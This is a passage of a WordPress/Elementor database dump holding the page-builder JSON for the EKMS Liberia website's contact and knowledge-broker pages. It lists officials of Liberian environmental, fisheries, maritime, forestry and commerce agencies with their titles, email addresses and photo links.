er\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23358,3393,'_elementor_edit_mode','builder'),(23359,3393,'_elementor_template_type','wp-page'),(23360,3393,'_elementor_version','3.0.16'),(23361,3393,'_wp_page_template','default'),(23362,3393,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a8